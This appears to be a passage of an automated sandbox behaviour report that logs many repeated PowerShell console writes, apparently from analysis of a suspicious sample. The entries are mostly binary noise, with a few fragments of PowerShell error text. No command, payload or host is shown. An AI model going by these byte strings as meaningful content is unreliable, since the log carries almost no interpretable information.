Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....XK......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....L................_.............}..v.....L......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....XS......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.M.......................*k.....T................_.............}..v.....T......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....X......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....hY................_.............}..v.....Y......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....(_......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....._................_.............}..v....``......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v.....c......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....d................_.............}..v....(e......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....P.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....P.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....0.......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v....h.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....@................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....@................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v............0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....X.......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#....... .........*k....p_S..............._.............}..v.... .......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......................_.............}..v....X.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....7.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....7.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....C.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....C.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....O.................*k....p_S..............._.............}..v....p.......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.M.....O.................*k....(................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v............0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....[.................*k......................_.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v............0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......................_.............}..v....P.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k....p_S..............._.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......................_.............}..v....P.......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....p.......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v............0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......................_.............}..v.... .......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v............0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....h................._.............}..v............0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p8......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(9................_.............}..v.....9......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p@......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(A................_.............}..v.....A......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....G......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....G................_.............}..v....8H......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....PL......0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....M................_.............}..v.....M......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....R......0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....`S................_.............}..v.....S......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....Z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....`[................_.............}..v.....[......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....`......0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....`................_.............}..v....8a......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....xf......0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....0g................_.............}..v.....g......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v....@k......0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....k................_.............}..v....xl......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v....P->.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......>..............._.............}..v......>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v....P5>.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k.....6>..............._.............}..v.....6>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v.....;>.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k.....<>..............._.............}..v.....=>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....0A>.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k.....A>..............._.............}..v....hB>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....p_S..............._.............}..v.....G>.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k....@H>..............._.............}..v.....H>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v.....O>.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....@P>..............._.............}..v.....P>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....T>.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k.....U>..............._.............}..v.....V>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k....p_S..............._.............}..v....X[>.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w.................*k.....\>..............._.............}..v.....\>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v.... `>.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....`>..............._.............}..v....Xa>.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p.J.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v......J.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....x.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......J..............._.............}..v....P.J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......J..............._.............}..v....P.J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v....p.J.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......J.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......J..............._.............}..v.... .J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v......J.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....h.J..............._.............}..v......J.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p.V.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.V..............._.............}..v......V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....p.V.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.V..............._.............}..v......V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v......V.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......V..............._.............}..v....8.V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....P.V.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......V..............._.............}..v......V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....p_S..............._.............}..v......V.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k....`.V..............._.............}..v......V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v......V.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....`.V..............._.............}..v......V.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v......W.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k......W..............._.............}..v....8.W.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....p_S..............._.............}..v....x.W.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................*k....0.W..............._.............}..v......W.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k....... .........*k....p_S..............._.............}..v....@.W.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................*k......................_.............}..v....x.W.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....4c.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....4c..............._.............}..v....85c.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....<c.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....<c..............._.............}..v....8=c.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....Bc.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....HCc..............._.............}..v.....Cc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.....Gc.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....Hc..............._.............}..v.....Ic.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8Nc.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....Nc..............._.............}..v....pOc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....8Vc.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....Vc..............._.............}..v....pWc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.....[c.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H\c..............._.............}..v.....\c.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....bc.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....bc..............._.............}..v....@cc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v.....fc.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....gc..............._.............}..v.....hc.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....H.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.... .o.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......o..............._.............}..v....X.o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v....p.o.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....(.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k....p_S..............._.............}..v......o.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k....p_S..............._.............}..v......o.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;....... . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v.... .o.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;.................*k......o..............._.............}..v....X.o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....p_S..............._.............}..v......o.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.................*k....P.o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S....... .........*k....p_S..............._.............}..v....`.o.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S.................*k......o..............._.............}..v......o.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k....p_S..............._.............}..v....@.{.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....g.................*k......{..............._.............}..v....x.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k....p_S..............._.............}..v....@.{.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....s.................*k......{..............._.............}..v....x.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v......{.....0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......{..............._.............}..v......{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.3.6.6. .c.h.a.r.:.3.5...........}..v.... .{.....0...............(\S.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......{..............._.............}..v....X.{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....x.{.....0.......................Z....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....0.{..............._.............}..v......{.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....x.|.....0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....0.|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....}..v......|.....0...............(\S.....,....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....H.|.....0.......................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v......|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .........*k....p_S..............._.............}..v......|.....0...............(\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k......|..............._.............}..v....H.|.....0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....;......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....<................_.............}..v.....=......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v.....C......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....D................_.............}..v.....E......0................\S............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k....p_S..............._.............}..v....`J......0.......................v....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................*k.....K................_.............}..v.....K......0................\S............................. Jump to behavior
